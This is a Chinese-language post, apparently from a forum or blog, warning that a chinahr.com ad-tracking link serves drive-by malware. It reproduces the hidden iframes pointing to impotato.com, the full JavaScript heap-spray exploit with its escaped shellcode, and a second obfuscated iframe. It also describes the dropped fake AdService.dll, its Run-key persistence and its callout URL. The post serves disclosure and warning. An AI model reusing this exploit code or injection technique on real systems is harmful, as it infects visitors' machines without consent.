chinahr 进入出现病毒
点击进入一个链接
首先进入:
http://track.chinahr.com/metrics/AdClick.aspx?AdID=742
这是一个apache的错误页面 奇怪的是aspx结尾,如果字面理解应该是。net的 除非特殊处理
我使用firefox进入,没有太大的反应
主要是里面嵌入了这样的代码
<iframe src="http://impotato.com/adv/34DRES74E/ads_r.html" width="1" height="1" style="visibility:hidden;"></iframe>
然后我打开了这个页面
http://impotato.com/adv/34DRES74E/ads_r.html
首先应该是使用了windows的一个漏洞
<SCRIPT language="javascript">
e = unescape("%u9090%u9090%u9090%u9090%ue1d9%u34d9%u5b24%u5b5b%u805b%uf4eb%u338d%uf789%uef81%ufd3d%uffff%u01eb%u8001%u0c7b%u7501%u313b%u8ac9%u490f%uc985%u1774%u3147%u31d2%u66c0%u078b%ufc80%u75ff%u3002%u88e4%u0654%u47f4%ue247%u8dec%u8133%ub2ee%uffff%u89ff%u31f7%u66c9%u75b9%u3102%ub2d2%uacdc%ud030%uaa42%uf9e2%u5489%u5c3b%ua90c%u3d6b%ub30f%u9593%u8484%u8585%u89c2%u8382%ub23c%uafc8%u819a%u929d%u978a%u979f%u98d2%u9a86%u69cc%u7776%u3f74%u2829%u6461%u647a%u6c78%u607a%u723e%u7e7d%u743b%u6172%u2a37%u5f2e%u584e%u284d%u6414%u4f0d%u400a%u425e%u40e4%u534f%u415c%u5d41%u1155%u5658%u5940%u195f%u565b%uf757%uf40d%u71b6%uc922%u310c%ucbcc%u47dc%u4948%uc5c2%u4de1%u4f4e%ud036%u7e91%uaa56%ude85%ua51d%uacd3%udc3a%u0699%u3162%ued0a%u6b2a%u988a%ue0bf%u9337%u13ec%u6e62%u4505%u2dff%u262c%u2289%uf080%u8f3f%u152c%u6548%uf1af%u547d%u4cb5%uc10b%u04fb%ue8dc%udcdd%udfdc%u6ec1%u6c41%u69e1%u0ffe%u1366%u6494%u104b%ufcc8%u6891%uf1f3%u765b%uac4e%ua9a8%udeaa%uc8df%u9cdc%u9f82%udfd6%ub5d8%ue249%u3040%u4bff%uc843%ud742%u0b94%u526d%u123b%u87ac%uc9a0%ucbda%ua5cc%ucc26%ud1d0%ud3b8%u062b%u925f%u5434%u735c%udddd%ubfde%u9c6b%u6a0e%u5c22%ue40e%ue9e8%u4f19%u2b8d%ue3a8%u49f2%ufeff%uf8f9%u7731%ufa10%ufbfa%u6d6c%u6f6e%u81c7%uffee%u0504%u9796%u9998%u8bcd%u0efc%u0f0e%u8180%u8382%u95d2%u14e2%u1918%u9072%uf141%u8797%u22d5%u2322%ua5e3%u24df%u2928%u2be9%u2d2c%uafa3%u32d8%u3332%ue5cb%ud6ef%u0de1%u601e%u6667%ubf65%ub5ab%uc224%u3c87%ub846%uc09b%u2d95%u8acd%u4f62%u39ff%u1ddc%ub95a%u80a9%u52b0%u5b5a%u285c%u3a2d%u5212%u4d50%u09ff%u670a%uba97%uade3%u053a%u1483%u0bb6%ua48d%uf2f9%u771f%u7978%u7b10%u7d16%u7f14%u7ed0%u0651%uf144%ud1a2%uf7e0%u55a6%u7203%u0259%uf817%u9392%uc594%u4469%uf1ce%u8c9b%uf496%u4861%u262d%ua3cb%ua5a4%u58f6%u427b%u546b%u51d9%u40c6%u517e%u4cd2%u8463%ue776%u6a47%uee79%u8cea%ud56c%u99e0%u48a6%ud584%u0743%uc5b0%u8b41%u46c0%ud3be%u5a7d%udbba%ud93f%u975d%ue8ec%u6a13%u5664%ud7f2%u3317%u0b6b%ub8ba%ub725%ubcba%ubcbc%ua967%ufbca%ua57b%uefd6%ub17d%uebd2%uad71%uefde%u9177%uebda%u448b%u883e%uff50%u067e%u82e2%u1340%u5787%u0e2e%uf2fb%u5a20%u219f%u169d%u28f6%ue7e5%udd2d%u27b2%u55c0%ue225%u28eb%ue027%udbc3%u5711%u3508%uce5b%u6bbb%u3216%u53df%u3bbd%ub273%u2760%ud63d%u23b5%u40cb%ua8a9%u7446%u189d%u1416%u1310%u89cf%u8c46%u0550%u0181%u01ce%u01e2%u0283");
ss = 20 + e.length;
bb = unescape( "%u0D0D" );
while ( bb.length < ss ) bb += bb;
fb = bb.substring( 0, ss );
b = bb.substring( 0, bb.length - ss );
while ( b.length + ss < 0x40000 ) b = b + b + fb;
memory = new Array();
for ( i=0; i<400; i++ ) memory[ i ] = b + e;
</SCRIPT>
进行了内存溢出的处理
然后在这里又隐藏了一个页面
<IFRAME width=1 height=1 SRC=http://www.impotato.com%20id=UGH5awBiN7SDMfXn5EN6AV7UTSVV4494pO0rdYFT5Bd4MC4yJ9VL2TFXD80yPy3Xo433QHLTY1FFN30VPAwBpIerUCyXRc32SQK5O2N5Y88hd98DER04CKDu9U0Aj2V6KIIK2N4BVMMIcVWY668O0YBAE7TlWOaK583MEfiIRCYtVj2KO1VB7CW45sUT9UGpCr0QEH52Os7uRgrWmWME4EQpc3D6xVaEPLVtl6Uk3piAJj2TwdM7mTHQN8oG0AaU9DnCLHH233O69OA4I5VUfob6lMK3g9g92fseFYQ80tILl0bL9uLqY0MHhK1E6cKN2ACRBPQRXLYeICVA3636m5HI7D1lrBIY542090WR80sswLKTYA6L8jFxgeng5Q53M1CmmJ29XRPcceekORy9A8LJcYNXPMN2SgTPFA4PQt0Br56nWUQGYckHjhQi6TvTSEOc7oEATVVTGxYEa2XTuOxbdpPFrLlx0EsW3NS563e6EouTc138Ys8jO1qIa81G0MCFFtXLoKas0c1Cl1yXt0CEBPXnNEDhRkRsPAE4y7S1 NAME="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??"></IFRAME>
这个页面下载了并执行了一个程序
这个程序叫做
AdService.dll
但是实际上是exe结尾的文件
执行的时候在任务栏出现一个类似sp2安全补丁的图标
文件放置在%winnt%\system32\下面,AdService.dll
同时
写入了注册的启动文件
Software\Microsoft\Windows\CurrentVersion\Run\
程序里面链接的地址是:
http://www.slimshield.com/landing.htm?wm=acc167&soft=sshield
确认是chinahr出现问题 大家暂时不要去
我的mail yhx001@gmail.com
